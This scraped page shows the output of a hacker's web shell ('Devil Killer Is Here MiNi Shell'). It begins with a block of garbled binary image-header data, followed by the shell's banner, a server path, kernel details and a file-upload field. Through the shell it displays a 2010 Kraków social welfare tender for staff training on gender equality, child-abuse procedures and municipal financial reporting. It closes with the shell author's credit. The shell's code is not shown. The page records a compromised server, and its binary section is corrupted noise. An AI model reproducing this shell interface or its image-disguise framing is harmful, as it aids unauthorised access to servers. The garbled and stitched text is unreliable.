JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100511/117035-N-2010.html

<p class="kh_header"><b>Kraków: przeprowadzenie szkolenia z zakresu polityk horyzontalnych Unii Europejskiej w odniesieniu do równości płci, z zakresu procedur pomocy dziecku krzywdzonemu oraz z zakresu sprawozdawczości jednostek samorządu terytorialnego.</b><br>
<b>Numer ogłoszenia: 117035 - 2010; data zamieszczenia: 11.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przeprowadzenie szkolenia z zakresu polityk horyzontalnych Unii Europejskiej w odniesieniu do równości płci, z zakresu procedur pomocy dziecku krzywdzonemu oraz z zakresu sprawozdawczości jednostek samorządu terytorialnego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

1.	I część zamówienia: Przeprowadzenie szkolenia z zakresu polityk horyzontalnych Unii Europejskiej w odniesieniu do równości płci dla 12 pracowników Zamawiającego, zgodnie z poniższymi wytycznymi:
1)	ilość godzin zegarowych: 8
2)	Wykonawca przekaże uczestnikom szkolenia materiały szkoleniowe oraz dokument potwierdzający odbycie szkolenia, oznakowany logotypami Unii Europejskiej, Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki oraz opatrzony informacją, że projekt jest współfinansowany ze środków Unii Europejskiej
3)	miejsce szkolenia: w zasobach lokalowych Zamawiającego przy ul. Beskidzkiej 30a w Krakowie.
4)	Tematyka szkolenia:	
a)   Polityka równych szans - podstawy prawne.
b)	Dyskryminacja - bariery w osiąganiu faktycznej równości kobiet i mężczyzn (stereotypy, uprzedzenia, dyskryminacja).
c)	Założenia polityki równości szans kobiet i mężczyzn - cele, korzyści, język wrażliwy na płeć.
d)	Uwzględnienie równości szans kobiet i mężczyzn na etapie wdrażania projektów współfinansowanych w ramach POKL

2.	II część zamówienia: Przeprowadzenie szkolenia z zakresu polityk horyzontalnych Unii Europejskiej w odniesieniu do równości płci, dla 44 pracowników Zamawiającego, zgodnie z poniższymi wytycznymi:
1)	szkolenie zostanie przeprowadzone w 2 grupach 22-osobowych, 
2)	szkolenie dla każdej grupy zostanie zrealizowane w wymiarze 16 godz. zegarowych, 
3)	szkolenie dla każdej grupy zostanie zrealizowane w ciągu 2 dni
4)	szkolenia zostaną przeprowadzone w łącznie 4 dniach (po 2 dni dla każdej z grup). Nie muszą to być dni następujące kolejno po sobie. 
5)	Wykonawca przekaże uczestnikom szkolenia materiały szkoleniowe oraz dokument potwierdzający odbycie szkolenia, oznakowany logotypami Unii Europejskiej, Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki oraz opatrzony informacją, że projekt jest współfinansowany ze środków Unii Europejskiej
6)	Wykonawca podczas szkolenia zapewni uczestnikom poczęstunek wg następującego menu dla każdej grupy:
a)	Pierwszy dzień szkolenia:
1.	22 banany o wadze min 200 g każdy
2.	22 jogurty owocowe, 150 g.
3.	11 wód mineralnych nie gazowanych 500 ml.
4.	11 wód mineralnych gazowanych 500 ml.
5.	11 ciastek biszkoptowych - 20 g.
6.	11 ciastek kruchych - 20 g.
7.	22 porcje dania ciepłego: kasza gryczana - 200 g., zestaw surówek 150 g., klopsiki w sosie własnym - 150 g., 
b)	Drugi dzień szkolenia: 
1.	22 jabłka o o wadze min 180 g. każde
2.	11 drożdżówek  z serem 150 g.
3.	11 drożdżówek z marmoladą 150 g.
4.	11 wód mineralnych nie gazowanych 500 ml.
5.	11 wód mineralnych gazowanych 500 ml.
6.	11 ciastek biszkoptowych - 20 g.
7.	11 ciastek kruchych - 20 g.
8.	22 porcje dania ciepłego: barszcz czerwony z uszkami 350 g., boeuf strogonow 350 g. 
6)	miejsce szkolenia: w zasobach lokalowych Zamawiającego przy ul. Dąbrowskiego 24  w Krakowie.
7)	Tematyka szkolenia:	
a)	Polityka równych szans - podstawy prawne.
b)	Dyskryminacja - bariery w osiąganiu faktycznej równości kobiet i mężczyzn (stereotypy, uprzedzenia, dyskryminacja).
c)	Założenia polityki równości szans kobiet i mężczyzn - cele, korzyści, język wrażliwy na płeć.
d)	Uwzględnienie równości szans kobiet i mężczyzn na etapie przygotowywania, aplikowania, realizacji i ewaluacji projektów współfinansowanych w ramach POKL
e)	Zwiększenie potencjału administracji publicznej w zakresie wprowadzania działań uwzględniających politykę równych szans. 

3.	III część zamówienia: Przeprowadzenie szkolenia z zakresu procedur pomocy dziecku krzywdzonemu dla 4 pracowników Zamawiającego, zgodnie z poniższymi wytycznymi:
1)	ilość godzin zegarowych: 6.
2)	Wykonawca przekaże uczestnikom szkolenia materiały szkoleniowe oraz dokument potwierdzający odbycie szkolenia.
3)	miejsce szkolenia: w granicach administracyjnych Krakowa.
4)	Zamawiający dopuszcza możliwość realizacji przedmiotu zamówienia w ramach ogólnodostępnego szkolenia organizowanego przez Wykonawcę. 
5)	Tematyka szkolenia:
Regulacje prawne dotyczące postępowania w sytuacjach zagrożenia życia dziecka oraz będące podstawą rozwiązywania problemu przemocy wobec dziecka.	
Przestępstwa popełniane na szkodę małoletnich.
Pojęcie przemocy fizycznej, seksualnej, psychicznej i emocjonalnej wobec dziecka. Dziecko w sytuacji zaniedbania:		
wzór zawiadomienia o popełnieniu przestępstwa,	
wzór zawiadomienia o nieprawidłowej sytuacji dziecka,
kwestionariusz dziecka krzywdzonego.
Identyfikacja czynników ryzyka wystąpienia przemocy wobec dziecka.       
Objawy przemocy u dziecka. Zespół dziecka maltretowanego.
Jak rozmawiać z dzieckiem krzywdzonym.	
Kompetencje pracowników pomocy społecznej i podstawy prawne dotyczące rozwiązywania problemu przemocy.
Postępowanie pracownika pomocy społecznej w przykładowych sytuacjach związanych z krzywdzeniem dzieci:
Dziecko jako ofiara przemocy fizycznej;
Dziecko w sytuacji zaniedbania;	
Dziecko jako ofiara przemocy seksualnej;	
Dziecko pozostawione bez opieki.	
Kompetencje nauczycieli i pedagoga szkolnego i podstawy prawne dotyczące rozwiązywania problemu przemocy.
Postępowanie wychowawcy i pedagoga szkolnego w przykładowych sytuacjach związanych z krzywdzeniem dzieci:
Dziecko doznające przemocy fizycznej i emocjonalnej w rodzinie;
Dziecko wykorzystywane seksualnie;
Dziecko krzywdzone ekonomicznie, zmuszane do żebrania, doznające przemocy emocjonalnej;
Dziecko w sytuacji zaniedbania;
Dziecko pod wpływem środków odurzających lub alkoholu.
Kompetencje Policji i podstawy prawne dotyczące rozwiązywania problemów przemocy,
Procedura pomocy dziecku krzywdzonemu - postępowanie Policji,
Procedura pomocy dziecku krzywdzonemu - postępowanie Straży Miejskiej.

4.	IV część zamówienia: Przeprowadzenie szkolenia z zakresu sprawozdawczości jednostek samorządu terytorialnego dla 3 pracowników Zamawiającego, zgodnie z poniższymi wytycznymi:
1)	ilość godzin zegarowych: 6.
2)	Wykonawca przekaże uczestnikom szkolenia materiały szkoleniowe oraz dokument potwierdzający odbycie szkolenia.
3)	miejsce szkolenia: w granicach administracyjnych Krakowa.
4)	Zamawiający dopuszcza możliwość realizacji przedmiotu zamówienia w ramach ogólnodostępnego szkolenia organizowanego przez Wykonawcę. 
5)	Tematyka szkolenia:
a) sprawozdania: Rb-27s, Rb-28s, Rb-27zz, Rb-NDS, Rb-PDP, Rb-34s, Rb-ST, Rb50,
b) sprawozdania w zakresie operacji finansowych: Rb-N, Rb-Z, Rb-Zn, Rb-UZ, Rb-UN
5.	Warunki płatności: przelewem w terminie do 14 dni od daty przyjęcia faktury przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających  stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące posiadania uprawnienia do wykonywania określonej działalności lub czynności, tj. są wpisani do rejestru instytucji szkoleniowych, prowadzonego na podst. rozporządzenia Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych (Dz. U. z 2004 r. nr 236 poz. 2365) lub do wykazu placówek, ośrodków i działalności oświatowej prowadzących kształcenie ustawiczne w formach pozaszkolnych, które uzyskały akredytację Kuratora Oświaty, prowadzonego na podst. rozporządzenia  Ministra Edukacji Narodowej i Sportu z dnia 20 grudnia 2003 r. w sprawie akredytacji placówek i ośrodków prowadzących kształcenie ustawiczne w formach pozaszkolnych (Dz. U. z 2003 r. nr 227 poz. 2247 z późn. zm.), o ile przepisy prawa wymagają posiadania wpisu do stosownego rejestru</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualny odpis z rejestru instytucji szkoleniowych lub wykazu placówek, ośrodków 
i działalności oświatowej prowadzących kształcenie ustawiczne w formach pozaszkolnych, które uzyskały akredytację Kuratora Oświaty. o ile przepisy prawa wymagają posiadania wpisu do stosownego rejestru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia, warunki płatności, miejsce realizacji zamówienia, podwykonawców i części zamówienia, której wykonanie Wykonawca powierzy podwykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.krakow.pl/?dok_id=27000<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS w Krakowie, ul. Józefińska 14, pok. 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2010 godzina 10:00, miejsce: Dziennik podawczy MOPS w Krakowie, ul. Józefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W zakresie I i II części przedmiot zamówienia jest finansownay ze środków UE w ramach projektu Pora na aktywność.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com